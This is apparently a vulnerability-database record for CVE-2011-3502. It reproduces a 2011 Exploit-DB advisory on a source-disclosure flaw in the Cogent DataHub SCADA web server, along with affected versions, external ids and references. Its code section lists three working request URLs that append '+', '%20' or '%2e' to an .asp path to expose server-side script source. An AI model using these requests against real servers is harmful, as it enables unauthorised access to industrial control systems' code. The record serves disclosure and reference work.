Details of VAR-E-201109-0021

ID

VAR-E-201109-0021

CVE

cve_id:	CVE-2011-3502	Trust: 1.9
cve_id:	CVE-2011-3500	Trust: 0.3
cve_id:	CVE-2011-3493	Trust: 0.3
cve_id:	CVE-2011-3501	Trust: 0.3

sources: BID: 49610 // BID: 49611 // EXPLOIT-DB: 17840 // EDBNET: 40361

EDB ID

17840

TITLE

Cogent DataHub 7.1.1.63 - Source Disclosure - Windows webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 17840

DESCRIPTION

Cogent DataHub 7.1.1.63 - Source Disclosure. CVE-2011-3502CVE-75574 . webapps exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 17840

AFFECTED PRODUCTS

vendor:	cogent	model:	datahub	scope:	eq	version:	7.1.1.63	Trust: 1.0
vendor:	cogent	model:	real-time systems opc datahub	scope:	eq	version:	6.0.2	Trust: 0.6
vendor:	cogent	model:	real-time systems opc datahub	scope:	eq	version:	6	Trust: 0.6
vendor:	cogent	model:	real-time systems cogent datahub	scope:	eq	version:	7.1.1.63	Trust: 0.6
vendor:	cogent	model:	real-time systems cogent datahub	scope:	eq	version:	7	Trust: 0.6
vendor:	cogent	model:	real-time systems cascade datahub	scope:	eq	version:	6	Trust: 0.6
vendor:	cogent	model:	real-time systems opc datahub	scope:	ne	version:	6.4.20	Trust: 0.6
vendor:	cogent	model:	real-time systems cogent datahub	scope:	ne	version:	7.1.2	Trust: 0.6
vendor:	cogent	model:	real-time systems cascade datahub	scope:	ne	version:	6.4.20	Trust: 0.6

sources: BID: 49610 // BID: 49611 // EXPLOIT-DB: 17840

EXPLOIT

#######################################################################

Luigi Auriemma

Application: Cogent DataHub
http://www.cogentdatahub.com/Products/Cogent_DataHub.html
Versions: <= 7.1.1.63
Platforms: Windows
Bug: source disclosure
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

DataHub is a software for the SCADA and automation sector.

#######################################################################

======
2) Bug
======

The server/service listens on port 80 using a custom web server.

Through the appending of the following chars it's possible to view the
content of the server-side scripts on the server:

+
%20
%2e

This vulnerability is useful when the server hosts customized scripts
which seems a feature of the software:
http://www.cogentdatahub.com/Features/DataHub_Web_ASP.html

#######################################################################

===========
3) The Code
===========

http://SERVER/index.asp+
http://SERVER/index.asp%20
http://SERVER/index.asp%2e

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

Trust: 1.0

sources: EXPLOIT-DB: 17840

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 17840

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 17840

TYPE

Source Disclosure

Trust: 1.0

sources: EXPLOIT-DB: 17840

CREDITS

Luigi Auriemma

Trust: 0.6

sources: EXPLOIT-DB: 17840

EXTERNAL IDS

db:	NVD	id:	CVE-2011-3502	Trust: 1.9
db:	EXPLOIT-DB	id:	17840	Trust: 1.6
db:	ICS CERT	id:	ICSA-11-280-01	Trust: 0.6
db:	EDBNET	id:	40361	Trust: 0.6
db:	NVD	id:	CVE-2011-3500	Trust: 0.3
db:	BID	id:	49610	Trust: 0.3
db:	NVD	id:	CVE-2011-3493	Trust: 0.3
db:	NVD	id:	CVE-2011-3501	Trust: 0.3
db:	BID	id:	49611	Trust: 0.3

sources: BID: 49610 // BID: 49611 // EXPLOIT-DB: 17840 // EDBNET: 40361

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2011-3502	Trust: 1.6
url:	http://www.cogentdatahub.com/products/cogent_datahub.html	Trust: 0.6
url:	http://www.us-cert.gov/control_systems/pdf/icsa-11-280-01.pdf	Trust: 0.6
url:	https://www.exploit-db.com/exploits/17840/	Trust: 0.6
url:	http://aluigi.org/mytoolz/mydown.zip	Trust: 0.3
url:	http://aluigi.altervista.org/adv/cogent_1-adv.txt	Trust: 0.3
url:	http://aluigi.altervista.org/adv/cogent_3-adv.txt	Trust: 0.3
url:	http://aluigi.org/poc/cogent_3.dat	Trust: 0.3
url:	http://aluigi.org/poc/cogent_1.dat	Trust: 0.3

sources: BID: 49610 // BID: 49611 // EXPLOIT-DB: 17840 // EDBNET: 40361

SOURCES

db:	BID	id:	49610
db:	BID	id:	49611
db:	EXPLOIT-DB	id:	17840
db:	EDBNET	id:	40361

LAST UPDATE DATE

2022-07-27T09:19:14.257000+00:00

SOURCES UPDATE DATE

db:	BID	id:	49610	date:	2011-10-11T16:20:00
db:	BID	id:	49611	date:	2015-03-19T08:47:00

SOURCES RELEASE DATE

db:	BID	id:	49610	date:	2011-09-13T00:00:00
db:	BID	id:	49611	date:	2011-09-13T00:00:00
db:	EXPLOIT-DB	id:	17840	date:	2011-09-14T00:00:00
db:	EDBNET	id:	40361	date:	2011-09-14T00:00:00